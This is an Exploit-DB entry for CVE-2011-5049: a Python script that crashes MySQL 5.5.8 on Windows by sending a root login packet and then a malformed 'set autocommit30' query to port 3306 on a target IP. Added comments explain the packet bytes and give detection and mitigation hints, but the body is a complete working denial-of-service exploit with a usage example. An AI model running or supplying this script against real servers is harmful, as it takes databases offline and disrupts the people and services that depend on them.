MySQL 5.5.8 Remote Denial Of Service (DOS)



EDB-ID: 18269 CVE: 2011-5049 OSVDB-ID: 78283
Author: Level Published: 2011-12-24 Verified: Not Verified
import socket, sys 

# Start-up banner, written to stdout before any argument checking happens.
# The text names the target the author had in mind ("MySQL 5.5.8 Null Ptr
# (windows)") and carries the author credit; it has no effect on the traffic.
for banner_line in (
    "\n",
    "----------------------------------------------------------------",
    "| MySQL 5.5.8 Null Ptr (windows)                                |",
    "| Level Smash the Stack                                         |",
    "----------------------------------------------------------------",
    "\n",
):
    print(banner_line)

# First canned packet, sent as-is right after the TCP connect.
# The 4-byte header declares a 38-byte body and sequence id 1. The body has
# the layout of a MySQL client login (handshake response) packet: 4 bytes of
# capability flags, 4 bytes of max packet size, 1 charset byte, 23 zero filler
# bytes, the NUL-terminated user name "root" and a zero-length auth field.
# NOTE(review): field names follow the documented MySQL client/server
# protocol; the page itself does not label the bytes - confirm before relying
# on them for a signature.
buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

# Second canned packet: the header declares a 17-byte body and sequence id 0,
# followed by command byte 0x03 (COM_QUERY in the MySQL protocol) and the
# malformed statement text "set autocommit30".
# Defender's view: the page header ties this to CVE-2011-5049, the banner
# describes the effect as a null-pointer crash on Windows, and the entry is
# marked "Not Verified". A client that pushes a query packet straight after
# its login packet without waiting for the server's replies is abnormal and
# can be flagged at the network layer. Limiting who can reach TCP 3306 and
# running a release newer than the one in the title reduce exposure - check
# the vendor advisory for the fixed version, which this page does not state.
buf2=("\x11\x00\x00\x00\x03set autocommit30")

def usage():
    """Print the command-line synopsis and one example invocation to stdout."""
    for text in (
        "usage : ./mysql.py <victim_ip>",
        "example: ./mysql.py 192.168.1.22",
    ):
        print(text)


def main():
    """Open one TCP connection to port 3306 of the given host and send both canned packets.

    The single command-line argument (sys.argv[1]) is used as the host. With
    any other argument count the usage text is printed and the process exits;
    sys.exit() is called without a status, so that exit reports success.

    Nothing is ever read from the socket: the server greeting and any reply to
    either packet are ignored, and there is no error handling around the
    connect or the sends. Seen from the server side this is a single short
    connection that writes a login packet and a query packet back to back and
    then closes, which is the pattern to look for in connection logs or
    network captures when triaging a crash of the version named in the banner.
    """
    if len(sys.argv) != 2:
        usage()
        sys.exit()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    HOST = sys.argv[1]
    # Port is fixed to the MySQL default; int() around the literal is a no-op.
    PORT = int(3306)
    s.connect((HOST,PORT))
    print "[*] Connect"
    # Login-shaped packet goes out before the server greeting has been read.
    s.send(buf)
    print "[*] Payload 1 sent"
    # Query packet follows immediately; no login result is awaited.
    s.send(buf2)
    # The script has no way to tell whether the service was affected - it only
    # reports that the bytes were handed to the socket.
    print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n"
    s.close()

# Run the client only when the file is executed as a script, not on import.
# The banner and the packet constants above are still evaluated on import.
if __name__ == "__main__":
    main()





